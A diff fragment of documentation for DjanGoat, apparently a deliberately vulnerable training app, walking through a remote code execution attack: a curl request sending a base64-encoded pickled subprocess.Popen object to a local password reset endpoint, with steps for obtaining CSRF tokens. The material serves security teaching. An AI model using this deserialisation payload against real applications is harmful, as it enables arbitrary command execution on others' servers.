Contrast-Security-OSS/DjanGoat/docs/Extra/RemoteCodeExecution.md

 curl -H 'Cookie:   csrftoken=<csrf_token>' --data "user=<encoded_object>=&password=password1&confirm_password=password1&csrfmiddlewaretoken=<middleware_token>" http://localhost:8000/password_resets/
 ```

-To get the crsf token fillout the password reset form and get the link.
+To get the crsf token fill out the password reset form and get the link.
 Then make this curl request

 ```
 curl -i localhost:8000/password_resets/?token=2-e1ee0df341f342553a75351cf5e13b31
 ```
 Scrolling to the top you will see the csrf_token.
-And right next to the form tag you will see the csrfmiddlewaretoken value.
-Now for encoded_object parameter put in the output of print base64.b64encode(pickle.dumps((subprocess.Popen, (('ls',),)))).
+And right next to <form> tag you will see the csrfmiddlewaretoken value.
+Now for encoded_object parameter put in the output of the python shell.
 When you send the request you should see the ls command executed!

 **The Solution:**